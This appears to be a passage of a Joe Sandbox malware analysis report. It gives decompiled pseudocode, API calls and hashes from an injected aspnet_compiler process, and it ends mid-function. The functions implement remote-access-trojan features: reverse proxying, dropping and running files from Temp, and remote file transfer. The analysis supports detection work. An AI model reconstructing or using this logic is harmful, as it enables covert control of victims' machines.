                							_t260 =  *((intOrPtr*)(_t157 + 2));
                							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
                							_v710 = _t260;
                							_t253 = _v716;
                							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
                								break;
                							} else {
                								_t157 = _t157 + 4;
                								_t213 = _t213 + 4;
                								__eflags = _v710;
                								if(_v710 != 0) {
                									continue;
                								} else {
                									goto L8;
                								}
                							}
                						}
                						L10:
                						__eflags = _t158;
                						if(_t158 != 0) {
                							_t214 =  &_v272;
                							_t243 = _t214 + 2;
                							do {
                								_t159 =  *_t214;
                								_t214 = _t214 + 2;
                								__eflags = _t159 - _v704;
                							} while (_t159 != _v704);
                							_v720 = (_t214 - _t243 >> 1) + 1;
                							_t162 = E00444A38(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
                							_v732 = _t162;
                							__eflags = _t162;
                							if(_t162 == 0) {
                								goto L1;
                							} else {
                								_v724 =  *((intOrPtr*)(_t253 + _t246));
                								_t35 = _t207 * 4; // 0xcea3
                								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
                								_t38 = _t246 + 8; // 0x8b56ff8b
                								_v740 =  *_t38;
                								_t223 =  &_v272;
                								_v712 = _t162 + 4;
                								_t166 = E004463E1(_t162 + 4, _v720,  &_v272);
                								_t268 = _t266 + 0xc;
                								__eflags = _t166;
                								if(_t166 != 0) {
                									_t167 = _v704;
                									_push(_t167);
                									_push(_t167);
                									_push(_t167);
                									_push(_t167);
                									_push(_t167);
                									E0043A5E8();
                									asm("int3");
                									_t169 =  *0x470518; // 0x0
                									return _t169;
                								} else {
                									__eflags = _v272 - 0x43;
                									 *((intOrPtr*)(_t253 + _t246)) = _v712;
                									if(_v272 != 0x43) {
                										L19:
                										_t172 = E00442ED1(_t207, _t223, _t246,  &_v700);
                										_t225 = _v704;
                										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
                									} else {
                										__eflags = _v270;
                										if(_v270 != 0) {
                											goto L19;
                										} else {
                											_t225 = _v704;
                											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
                										}
                									}
                									__eflags = _t207 - 2;
                									if(_t207 != 2) {
                										__eflags = _t207 - 1;
                										if(_t207 != 1) {
                											__eflags = _t207 - 5;
                											if(_t207 == 5) {
                												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
                											}
                										} else {
                											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
                										}
                									} else {
                										_t258 = _v728;
                										_t244 = _t225;
                										_t235 = _t258;
                										 *(_t246 + 8) = _v708;
                										_v712 = _t258;
                										_v720 = _t258[8];
                										_v708 = _t258[9];
                										while(1) {
                											_t64 = _t246 + 8; // 0x8b56ff8b
                											__eflags =  *_t64 -  *_t235;
                											if( *_t64 ==  *_t235) {
                												break;
                											}
                											_t259 = _v712;
                											_t244 = _t244 + 1;
                											_t204 =  *_t235;
                											 *_t259 = _v720;
                											_v708 = _t235[1];
                											_t235 = _t259 + 8;
                											 *((intOrPtr*)(_t259 + 4)) = _v708;
                											_t207 = _v744;
                											_t258 = _v728;
                											_v720 = _t204;
                											_v712 = _t235;
                											__eflags = _t244 - 5;
                											if(_t244 < 5) {
                												continue;
                											} else {
                											}
                											L27:
                											__eflags = _t244 - 5;
                											if(__eflags == 0) {
                												_t88 = _t246 + 8; // 0x8b56ff8b
                												_t195 = E0044F9AC(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x45b4e8, 0x7f,  &_v528,  *_t88, 1);
                												_t268 = _t268 + 0x1c;
                												__eflags = _t195;
                												_t196 = _v704;
                												if(_t195 == 0) {
                													_t258[1] = _t196;
                												} else {
                													do {
                														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
                														_t196 = _t196 + 1;
                														__eflags = _t196 - 0x7f;
                													} while (_t196 < 0x7f);
                													_t199 = E004358BA( &_v528,  *0x46f170, 0xfe);
                													_t268 = _t268 + 0xc;
                													__eflags = _t199;
                													_t258[1] = 0 | _t199 == 0x00000000;
                												}
                												_t103 = _t246 + 8; // 0x8b56ff8b
                												 *_t258 =  *_t103;
                											}
                											 *(_t246 + 0x18) = _t258[1];
                											goto L38;
                										}
                										__eflags = _t244;
                										if(_t244 != 0) {
                											 *_t258 =  *(_t258 + _t244 * 8);
                											_t258[1] =  *(_t258 + 4 + _t244 * 8);
                											 *(_t258 + _t244 * 8) = _v720;
                											 *(_t258 + 4 + _t244 * 8) = _v708;
                										}
                										goto L27;
                									}
                									L38:
                									_t173 = _t207 * 0xc;
                									_t110 = _t173 + 0x45b428; // 0x40f943
                									 *0x4574c8(_t246);
                									_t175 =  *((intOrPtr*)( *_t110))();
                									_t228 = _v724;
                									__eflags = _t175;
                									if(_t175 == 0) {
                										__eflags = _t228 - 0x46f2a8;
                										if(_t228 != 0x46f2a8) {
                											_t257 = _t207 + _t207;
                											__eflags = _t257;
                											asm("lock xadd [eax], ecx");
                											if(_t257 != 0) {
                												goto L43;
                											} else {
                												_t128 = _t257 * 8; // 0x30ff068b
                												E00445002( *((intOrPtr*)(_t246 + _t128 + 0x28)));
                												_t131 = _t257 * 8; // 0x30ff0c46
                												E00445002( *((intOrPtr*)(_t246 + _t131 + 0x24)));
                												_t134 = _t207 * 4; // 0xcea3
                												E00445002( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
                												_t231 = _v704;
                												 *((intOrPtr*)(_v716 + _t246)) = _t231;
                												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
                											}
                										}
                										_t229 = _v732;
                										 *_t229 = 1;
                										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
                									} else {
                										 *(_v716 + _t246) = _t228;
                										_t115 = _t207 * 4; // 0xcea3
                										E00445002( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
                										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
                										E00445002(_v732);
                										 *(_t246 + 8) = _v740;
                										goto L1;
                									}
                									goto L2;
                								}
                							}
                						} else {
                							goto L2;
                						}
                						goto L47;
                					}
                					asm("sbb eax, eax");
                					_t158 = _t157 | 0x00000001;
                					__eflags = _t158;
                					goto L10;
                				} else {
                					L1:
                					L2:
                					return E004338BB(_v8 ^ _t262);
                				}
                				L47:
                 			}

                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                • _memcmp.LIBVCRUNTIME ref: 00443D24
                • _free.LIBCMT ref: 00443D95
                • _free.LIBCMT ref: 00443DAE
                • _free.LIBCMT ref: 00443DE0
                • _free.LIBCMT ref: 00443DE9
                • _free.LIBCMT ref: 00443DF5
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$ErrorLast$_abort_memcmp
                • String ID: C
                • API String ID: 1679612858-1037565863
                • Opcode ID: d4e76e1364c82f65dc818964d64206a26a0234a24ffe08a66c1da97ccf9c8ffa
                • Instruction ID: 0980accce80153226f5651e8385caabd2fc42b640f1cc77c082d88c635091a5b
                • Opcode Fuzzy Hash: d4e76e1364c82f65dc818964d64206a26a0234a24ffe08a66c1da97ccf9c8ffa
                • Instruction Fuzzy Hash: 71B16B75A016199FEB24DF18C884BAEB7B4FF08705F5085AEE849A7351E734AE90CF44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 45%
                			E00413C51(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
                				intOrPtr _v0;
                				char _v4;
                				signed int _v8;
                				signed short _v12;
                				signed int _v16;
                				signed int _v20;
                				signed short _v24;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				signed int _v40;
                				signed int _v48;
                				signed int _t70;
                				signed short _t81;
                				signed int _t82;
                				signed short _t85;
                				signed short _t86;
                				void* _t88;
                				signed int _t97;
                				signed char _t99;
                				void* _t100;
                				signed int _t107;
                				signed short _t108;
                				signed int _t110;
                				signed int _t116;
                				signed int* _t118;
                				signed int _t119;
                				signed int _t120;
                				intOrPtr _t121;
                
                				_t110 = _a8;
                				_t99 = 0;
                				_t120 = _a4;
                				_t97 = 0;
                				_v28 = 0;
                				_v16 = 0;
                				_v32 = 0;
                				_v4 = 0;
                				_v12 = 0;
                				_v24 = 0;
                				_v8 = 0;
                				_v20 = 0;
                				_t119 = 0;
                				_t118 = _a16;
                				 *_t118 = 0;
                				if(_t120 != 0 || _t110 != 0) {
                					_t70 = _a12;
                					__eflags = _t70;
                					if(_t70 == 0) {
                						L20:
                						_a16 = _t97;
                						__eflags = _t110;
                						if(_t110 == 0) {
                							L40:
                							__eflags = _t120;
                							if(_t120 == 0) {
                								__eflags = _v28 & 0x00000001;
                								_t100 = 0;
                								_t72 =  !=  ? _t100 : 0x7f000001;
                								__imp__#8(0x7f000001);
                								_t121 =  !=  ? _t100 : 0x7f000001;
                								L47:
                								_t73 = E004139B4(_t97, _v20, __eflags, _v36, _t121);
                								 *_t118 = _t73;
                								__eflags = _t73;
                								if(_t73 != 0) {
                									__eflags = _v0 - _t119;
                									if(_v0 == _t119) {
                										L54:
                										__eflags = _v28;
                										if(_v28 == 0) {
                											L57:
                											return _t119;
                										}
                										_t119 = E00413BD8(_v24,  *_t118);
                										__eflags = _t119;
                										if(_t119 == 0) {
                											goto L57;
                										}
                										L56:
                										E00413C16(_t73,  *_t118);
                										 *_t118 =  *_t118 & 0x00000000;
                										__eflags =  *_t118;
                										goto L57;
                									}
                									 *_t73 =  *_t73 | 0x00000004;
                									__eflags = _v32 & 0x00000002;
                									if((_v32 & 0x00000002) == 0) {
                										goto L54;
                									}
                									__imp__#12(_t121);
                									 *((intOrPtr*)( *_t118 + 0x14)) = E00413936(_t73);
                									_t73 =  *_t118;
                									__eflags =  *((intOrPtr*)(_t73 + 0x14)) - _t119;
                									if( *((intOrPtr*)(_t73 + 0x14)) != _t119) {
                										goto L54;
                									}
                									_t119 = 8;
                									L53:
                									__eflags = _t119;
                									if(_t119 != 0) {
                										goto L56;
                									}
                									goto L54;
                								}
                								_t119 = 8;
                								goto L56;
                							}
                							__eflags = E0041396E(_t120,  &_v4);
                							if(__eflags != 0) {
                								_t121 = _v4;
                								goto L47;
                							}
                							_t73 = _v28;
                							__eflags = _t73 & 0x00000004;
                							if((_t73 & 0x00000004) == 0) {
                								_push(_t118);
                								_push(_t73 & 0x00000002);
                								_push(_v32);
                								_push(_v16);
                								_t119 = E00413ACD(_t120, _t97);
                								goto L53;
                							}
                							_t119 = 0x2af9;
                							goto L56;
                						}
                						_t107 = E0043E19F(_t99, _t110,  &_v12, 0xa) & 0x0000ffff;
                						_t81 = _v12;
                						_v32 = _t107;
                						__eflags =  *_t81;
                						if( *_t81 != 0) {
                							__eflags = _t97;
                							if(_t97 == 0) {
                								L26:
                								__imp__#55(_a8, "udp");
                								__eflags = _t81;
                								if(_t81 != 0) {
                									_t85 =  *(_t81 + 8) & 0x0000ffff;
                									_v28 = _t85;
                									_t81 = _t85 & 0x0000ffff;
                									_v40 = _t81;
                								}
                								L28:
                								__eflags = _t97;
                								if(_t97 == 0) {
                									L30:
                									__imp__#55(_v0, "tcp");
                									_t116 = 1;
                									__eflags = _t81;
                									if(_t81 == 0) {
                										L32:
                										_t108 = _v24;
                										_t82 = _v48;
                										L33:
                										__eflags = _t82;
                										if(_t82 != 0) {
                											__eflags = _t97;
                											if(_t97 != 0) {
                												goto L40;
                											}
                											__eflags = _t108;
                											_t97 = (_t97 & 0xffffff00 | _t108 == 0x00000000) + 1;
                											__eflags = _t108;
                											if(_t108 == 0) {
                												L39:
                												_t48 =  &_v40;
                												 *_t48 = _v40 & _t119;
                												__eflags =  *_t48;
                												goto L40;
                											}
                											__eflags = _v36 - _t119;
                											if(_v36 == _t119) {
                												goto L39;
                											}
                											_v40 = _t116;
                											goto L40;
                										}
                										__eflags = _t97;
                										_t84 =  !=  ? 0x277d : 0x2af9;
                										return  !=  ? 0x277d : 0x2af9;
                									}
                									_t108 =  *(_t81 + 8) & 0x0000ffff;
                									_t82 = _t108 & 0x0000ffff;
                									_v48 = _t82;
                									goto L33;
                								}
                								_t116 = 1;
                								__eflags = _t97 - 1;
                								if(_t97 != 1) {
                									goto L32;
                								}
                								goto L30;
                							}
                							__eflags = _t97 - 2;
                							if(_t97 != 2) {
                								goto L28;
                							}
                							goto L26;
                						}
                						__imp__#9(_t107);
                						_t86 = _t81 & 0x0000ffff;
                						__eflags = _t97;
                						_v24 = _t86;
                						_v36 = _t86 & 0x0000ffff;
                						_t88 = 1;
                						_t97 =  ==  ? _t88 : _t97;
                						__eflags = _a12;
                						_v28 = 0 | _a12 == 0x00000000;
                						goto L40;
                					}
                					__eflags =  *((intOrPtr*)(_t70 + 0x10)) - _t99;
                					if( *((intOrPtr*)(_t70 + 0x10)) != _t99) {
                						L23:
                						return 0x2afb;
                					}
                					__eflags =  *((intOrPtr*)(_t70 + 0x14)) - _t99;
                					if( *((intOrPtr*)(_t70 + 0x14)) != _t99) {
                						goto L23;
                					}
                					__eflags =  *((intOrPtr*)(_t70 + 0x18)) - _t99;
                					if( *((intOrPtr*)(_t70 + 0x18)) != _t99) {
                						goto L23;
                					}
                					__eflags =  *((intOrPtr*)(_t70 + 0x1c)) - _t99;
                					if( *((intOrPtr*)(_t70 + 0x1c)) != _t99) {
                						goto L23;
                					}
                					_t99 =  *_t70;
                					_v28 = _t99;
                					__eflags = _t99 & 0x00000002;
                					if((_t99 & 0x00000002) == 0) {
                						L11:
                						__eflags =  *((intOrPtr*)(_t70 + 4)) - _t97;
                						if( *((intOrPtr*)(_t70 + 4)) == _t97) {
                							L14:
                							_t97 =  *(_t70 + 8);
                							__eflags = _t97;
                							if(_t97 == 0) {
                								L19:
                								_v16 =  *((intOrPtr*)(_t70 + 0xc));
                								goto L20;
                							}
                							__eflags = _t97 - 1;
                							if(_t97 == 1) {
                								goto L19;
                							}
                							__eflags = _t97 - 2;
                							if(_t97 == 2) {
                								goto L19;
                							}
                							__eflags = _t97 - 3;
                							if(_t97 == 3) {
                								goto L19;
                							}
                							return 0x273c;
                						}
                						__eflags =  *((intOrPtr*)(_t70 + 4)) - 2;
                						if( *((intOrPtr*)(_t70 + 4)) == 2) {
                							goto L14;
                						}
                						return 0x273f;
                					}
                					__eflags = _t120;
                					if(_t120 != 0) {
                						goto L11;
                					}
                					return 0x2726;
                				} else {
                					return 0x2af9;
                				}
                 			}

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: tcp$udp
                • API String ID: 0-3725065008
                • Opcode ID: 989d942223f8045c26bfd392dcc121cd2c507f3a9003dba06f7d9cf9a685d5a6
                • Instruction ID: 254d435c4adeb88c6bd87cc200726294b993cf902dfc57313b1be41f1fc3726a
                • Opcode Fuzzy Hash: 989d942223f8045c26bfd392dcc121cd2c507f3a9003dba06f7d9cf9a685d5a6
                • Instruction Fuzzy Hash: A77188706083028FDB24CE15D4846ABBBE4EF94746F14493FF88597360E779CE858B9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 67%
                			E00410A38(void* __edx, void* __eflags, intOrPtr _a4) {
                				char _v32;
                				char _v56;
                				void* _v60;
                				char _v72;
                				char _v76;
                				char _v80;
                				char _v88;
                				char _v92;
                				void* _v96;
                				char _v108;
                				char _v112;
                				void* __ebx;
                				void* __edi;
                				void* __ebp;
                				intOrPtr* _t26;
                				char* _t34;
                				char* _t37;
                				intOrPtr _t50;
                				char* _t51;
                				char* _t58;
                				intOrPtr _t60;
                				intOrPtr _t61;
                				char* _t65;
                				void* _t68;
                				intOrPtr _t121;
                				void* _t125;
                				void* _t128;
                				void* _t130;
                				void* _t131;
                				void* _t133;
                				void* _t135;
                				signed int _t136;
                				void* _t139;
                				void* _t140;
                				void* _t141;
                				void* _t145;
                
                				_t147 = __eflags;
                				_t111 = __edx;
                				_push(_t68);
                				_t121 = _a4;
                				E004020D6(_t68,  &_v76, __edx, __eflags, _t121 + 0xc);
                				SetEvent( *(_t121 + 0x24));
                				_t26 = E00401F8B( &_v80);
                				E00404182( &_v80,  &_v56, 4, 0xffffffff);
                				_t139 = (_t136 & 0xfffffff8) - 0x3c;
                				E004020D6(0x472ec8, _t139, _t111, _t147, 0x472ec8);
                				_t140 = _t139 - 0x18;
                				E004020D6(0x472ec8, _t140, _t111, _t147,  &_v72);
                				E0041A976( &_v112, _t111);
                				_t141 = _t140 + 0x30;
                				_t125 =  *_t26 - 0x46;
                				if(_t125 == 0) {
                					E00401E45( &_v88, _t111, _t135, __eflags, 1);
                					_t34 = E0040245C();
                					E00401F8B(E00401E45( &_v92, _t111, _t135, __eflags, 1));
                					_t112 = _t34;
                					_t37 = E00411235();
                					_t127 = _t37;
                					__eflags = _t37;
                					if(__eflags == 0) {
                						_t128 = _t141 - 0x18;
                						_push("1");
                						L19:
                						_t111 = E00402F11( &_v32, E00401E45( &_v88, _t112, _t135, __eflags, 0), _t135, 0x472ec8);
                						E00408832(0x472ec8, _t128, _t39, _t121, _t135, __eflags);
                						_push(0x85);
                						E00404A81(_t121, _t39, __eflags);
                						E00401FB8();
                						L20:
                						E00401E6D( &_v108, _t111);
                						E00401FB8();
                						E00401FB8();
                						return 0;
                					}
                					 *0x470d50 = E004114AA(_t127, "StartForward");
                					 *0x470d4c = E004114AA(_t127, "StartReverse");
                					 *0x470d54 = E004114AA(_t127, "StopForward");
                					_t50 = E004114AA(_t127, "StopReverse");
                					_t112 = "GetDirectListeningPort";
                					 *0x470d5c = _t50;
                					_t51 = E004114AA(_t127, "GetDirectListeningPort");
                					__eflags =  *0x470d50;
                					 *0x470d58 = _t51;
                					if(__eflags == 0) {
                						L17:
                						_t128 = _t141 - 0x18;
                						_push("2");
                						goto L19;
                					}
                					__eflags =  *0x470d4c;
                					if(__eflags == 0) {
                						goto L17;
                					}
                					__eflags =  *0x470d54;
                					if(__eflags == 0) {
                						goto L17;
                					}
                					__eflags = _t51;
                					if(__eflags == 0) {
                						goto L17;
                					}
                					 *0x470d49 = 1;
                					E004020D6(0x472ec8, _t141 - 0x18, "GetDirectListeningPort", __eflags, E00401E45( &_v88, "GetDirectListeningPort", _t135, __eflags, 0));
                					_push(0x76);
                					L10:
                					E00404A81(_t121, _t112, __eflags);
                					goto L20;
                				}
                				_t130 = _t125 - 1;
                				if(_t130 == 0) {
                					_t58 =  *0x470d50(E0043A3AC(_t55, E00401F8B(E00401E45( &_v88, _t111, _t135, __eflags, 0))));
                					_t145 = _t141 - 0x14;
                					L9:
                					_t112 = _t58;
                					E0041A6E9(0x472ec8, _t145, _t58);
                					_push(0x77);
                					goto L10;
                				}
                				_t131 = _t130 - 1;
                				if(_t131 == 0) {
                					_t60 =  *0x470adc; // 0x140f348
                					_t61 =  *((intOrPtr*)(_t60 + 0x18));
                					__imp__#12( *((intOrPtr*)(_t61 + 4)));
                					_t65 =  *0x470d4c(_t61, E0043A3AC(_t62, E00401F8B(E00401E45( &_v92, _t111, _t135, __eflags, 0))) & 0x0000ffff);
                					__eflags = _t65;
                					_t109 =  !=  ? 1 :  *0x470d4a & 0x000000ff;
                					 *0x470d4a =  !=  ? 1 :  *0x470d4a & 0x000000ff;
                					_t112 = _t65;
                					E0041A6E9(0x472ec8, _t141 - 0x10, _t65);
                					_push(0x78);
                					goto L10;
                				}
                				_t133 = _t131 - 1;
                				if(_t133 == 0) {
                					_t58 =  *0x470d54();
                					_t145 = _t141 - 0x18;
                					goto L9;
                				}
                				if(_t133 == 1) {
                					 *0x470d5c();
                					 *0x470d4a = 0;
                				}
                				goto L20;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Eventinet_ntoa
                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                • API String ID: 3578746661-168337528
                • Opcode ID: af03b7a25076df44827bf509d870b99db58fd949c03e63e8dbabe2dd9f5d5f63
                • Instruction ID: e75f285b9767d1c550f565d519be053d97adf82a0a3bf380a10654d69fa8857e
                • Opcode Fuzzy Hash: af03b7a25076df44827bf509d870b99db58fd949c03e63e8dbabe2dd9f5d5f63
                • Instruction Fuzzy Hash: A051D631A043009BC714BB79D81A66E36A5AB80314F40453FF90AA76E5EF7C9985CBDF
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E00416BCD(void* __edx, void* __eflags, char _a4, char _a28) {
                				char _v28;
                				struct _SHELLEXECUTEINFOA _v88;
                				char _v112;
                				char _v136;
                				char _v316;
                				void* __ebx;
                				void* __esi;
                				void* __ebp;
                				void* _t33;
                				void* _t41;
                				intOrPtr _t50;
                				signed int _t60;
                				char* _t68;
                				void* _t73;
                				void* _t90;
                				void* _t91;
                
                				_t94 = __eflags;
                				_t33 = E00402073(_t60,  &_v136, __edx, _t90, "\\");
                				_t87 = E004052DD(_t60,  &_v112, E0043A9AA(_t60, __eflags, "Temp"), _t90, _t94, _t33);
                				E00402EF0(_t60,  &_v28, _t35, _t90, _t94,  &_a4);
                				E00401FB8();
                				_t68 =  &_v136;
                				E00401FB8();
                				_push(_t68);
                				_push(_t68);
                				_t41 = E00416E0A(E0040F0F6( &_v316, _t35, _t94, E00401F8B( &_v28), 0x10),  &_v316);
                				_t95 = _t41;
                				if(_t41 == 0) {
                					E00402073(_t60, _t91 - 0x18, _t87, _t90, 0x464074);
                					_push(0x6f);
                					_t73 = 0x473580;
                					goto L6;
                				} else {
                					_t87 =  &_a28;
                					E00416E1A( &_v316,  &_a28, _t95);
                					E0040F0A7( &_v316,  &_a28, _t95);
                					_v88.hwnd = _v88.hwnd & 0x00000000;
                					_v88.lpVerb = _v88.lpVerb & 0x00000000;
                					_v88.cbSize = 0x3c;
                					_v88.fMask = 0x40;
                					_t50 = E00401F8B( &_v28);
                					asm("movaps xmm0, [0x46b1c0]");
                					_v88.lpFile = _t50;
                					asm("movups [ebp-0x40], xmm0");
                					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
                					_t97 = _v88.hProcess;
                					if(_v88.hProcess != 0) {
                						E00402073(_t60, _t91,  &_a28, _t90, 0x464074);
                						_push(0x70);
                						E00404A81(0x473580, _t87, _t97);
                						WaitForSingleObject(_v88.hProcess, 0xffffffff);
                						CloseHandle(_v88.hProcess);
                						DeleteFileA(E00401F8B( &_v28));
                					}
                					_t98 = _t60 - 1;
                					if(_t60 == 1) {
                						E00402073(_t60, _t91 - 0x18, _t87, _t90, 0x464074);
                						_push(0x6e);
                						_t73 = 0x473580;
                						L6:
                						E00404A81(_t73, _t87, _t98);
                					}
                				}
                				E0040E8CD(_t60,  &_v316, 0x464074);
                				E00401FB8();
                				E00401FB8();
                				return E00401FB8();
                			}

                APIs
                  • Part of subcall function 00416E1A: __EH_prolog.LIBCMT ref: 00416E1F
                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00464074), ref: 00416CCA
                • CloseHandle.KERNEL32(00000000), ref: 00416CD3
                • DeleteFileA.KERNEL32(00000000), ref: 00416CE2
                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416C96
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                • String ID: <$@$Temp
                • API String ID: 1704390241-1032778388
                • Opcode ID: ff9cea69b05bc38d64019fd9820552f1091102cc02052d8ee4391d685e661bf1
                • Instruction ID: 69e270f03dbcf525bbd0e705c12af2ecc391514570d21efb9077f5f7aa5c102b
                • Opcode Fuzzy Hash: ff9cea69b05bc38d64019fd9820552f1091102cc02052d8ee4391d685e661bf1
                • Instruction Fuzzy Hash: A54196319002099BDB14FBA1DC56AED7738AF50318F50427EF505760D2EF785A86CB99
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E00406FD7(intOrPtr __ecx, void* __eflags, intOrPtr _a8, char _a12, char _a16, void* _a36, char _a40, void _a52, char _a64, intOrPtr _a100052, intOrPtr _a100072, char _a100080) {
                				long _v0;
                				char _v8;
                				char _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				void* __ebx;
                				void* __ebp;
                				WCHAR* _t35;
                				long _t42;
                				struct _OVERLAPPED* _t54;
                				intOrPtr _t72;
                				intOrPtr _t74;
                				long _t76;
                				void* _t77;
                				void* _t78;
                				void* _t80;
                				void* _t82;
                				void* _t83;
                				void* _t85;
                
                				_t82 = __eflags;
                				E00455FB0();
                				_push(_t77);
                				_t74 = __ecx;
                				_t69 =  &_a100080;
                				asm("xorps xmm0, xmm0");
                				_a8 = __ecx;
                				_t54 = 0;
                				asm("movlpd [esp+0x10], xmm0");
                				_a12 = 0;
                				E00403242(0,  &_a16, _t77, _t82, E004087F0( &_a40,  &_a100080, _t77, L".part"));
                				E00401EE9();
                				_t78 = CreateFileW(E00401EE4( &_a12), 4, 0, 0, 2, 0x80, 0);
                				_t83 = _v0 - _a100072;
                				if(_t83 > 0) {
                					L6:
                					CloseHandle(_t78);
                					_t35 = E00401EE4( &_a100080);
                					MoveFileW(E00401EE4( &_a16), _t35);
                					_t54 = 1;
                				} else {
                					_t72 = _a100072;
                					if(_t83 >= 0) {
                						L5:
                						if(_v0 < _t72) {
                							goto L2;
                						} else {
                							goto L6;
                						}
                					} else {
                						while(1) {
                							L2:
                							_t42 = E00404B76(_t74,  &_a64, 0x186a0);
                							_t76 = _t42;
                							asm("cdq");
                							_v12 = _v12 + _t42;
                							asm("adc [esp+0x18], edx");
                							WriteFile(_t78,  &_a52, _t76,  &_v0, _t54);
                							_t80 = _t80 - 0x18;
                							E00402097(_t54, _t80, _t69, _t78, _t83,  &_v12, 8);
                							E00404A81(_v12, _t69, _t83, 0x57, _v12);
                							if(_t76 <= 0) {
                								break;
                							}
                							_t74 = _v16;
                							_t85 = _v20 - _a100052;
                							if(_t85 < 0) {
                								continue;
                							} else {
                								if(_t85 > 0) {
                									goto L6;
                								} else {
                									goto L5;
                								}
                							}
                							goto L7;
                						}
                						CloseHandle(_t78);
                						DeleteFileW(E00401EE4( &_v8));
                					}
                				}
                				L7:
                				E00401EE9();
                				E00401EE9();
                				return _t54;
                			}

                APIs
                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00472EC8,00463F74,?,00000000,00407670,00000000), ref: 00407039
                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407670,00000000,?,?,0000000A,00000000), ref: 00407081
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                • CloseHandle.KERNEL32(00000000,?,00000000,00407670,00000000,?,?,0000000A,00000000), ref: 004070C1
                • MoveFileW.KERNEL32(00000000,00000000), ref: 004070DE
                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407109
                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407119
                  • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,?,00472EE0,00404C29,00000000,?,?,?,00472EE0,?), ref: 00404B85
                  • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                • String ID: .part
                • API String ID: 1303771098-3499674018
                • Opcode ID: c1f8b3c5b868d065d82fa0cba3452d5e8800a2f86f6f1877546f0846b4ec2f4f
                • Instruction ID: e251a7d4a1aabd80805b5d7196bb96980f3888c3ff40e4c14fed717d8046ce17
                • Opcode Fuzzy Hash: c1f8b3c5b868d065d82fa0cba3452d5e8800a2f86f6f1877546f0846b4ec2f4f
                • Instruction Fuzzy Hash: FE318571508301AFC210EB61DC859AFB7ECEB94355F40493FF945A21D2DB78EA488B9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E0040B463(void* __eflags) {
                				char _v28;
                				char _v52;
                				char _v76;
                				char _v340;
                				void* __ebx;
                				void* __esi;
